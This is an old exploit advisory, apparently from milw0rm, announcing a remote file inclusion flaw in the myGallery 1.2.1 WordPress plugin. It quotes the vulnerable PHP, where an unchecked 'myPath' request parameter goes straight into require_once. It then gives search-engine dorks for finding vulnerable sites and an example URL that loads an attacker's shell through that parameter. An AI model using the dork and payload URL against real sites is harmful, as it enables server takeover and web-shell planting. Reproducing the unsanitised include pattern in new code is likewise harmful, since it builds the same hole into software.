AAAAAAAAA AAAAAAAA AAA AAA AAA AAAAAAAA
AAAAAAAAA AAAAAAAAA AAA AAA AAAAA AAAAAAAAAA
AAA AAA AAA AAA AAA AAAAAAA AAA
AAA AAAAAAAAA AAAAA AAA AAA AAA AAAAA
AAA AAAAAAAA AAA AAA AAA AAA AAAAA
AAA AAA AAA AAA AAAAAAAAA AAA AAA
AAA AAA AAA AAA AAA AAA AAAAAAAAAA
AAA AAA AAA AAA AAA AAA AAAAAAAA

myGallery 1.2.1(myPath)Remote File Include Vulnerablity

Script Paeg : http://www.wildbits.de/usr_files/mygallery_1.2.1.zip

Discovered by: GolD_M = [Mahmood_ali]

Homepage: http://www.Tryag.cc

V.Code

#########################################################

if (!$_POST){

$mypath=$_GET['myPath']; <---------[+]

}

else {

$mypath=$_POST['myPath'];<---------[+]

}

require_once($mypath.'/wp-config.php');<---------[+]

########################################################

Dork :

inurl:/mygallery/myfunctions/ (OR) Index of /mygallery/myfunctions (OR) inurl:mygallerytmpl.php

Ex:

[Path_myGallery]/mygallery/myfunctions/mygallerybrowser.php?myPath=Shell

Sp.Thanx = Tryag-Team

milw0rm.com [2007-04-29]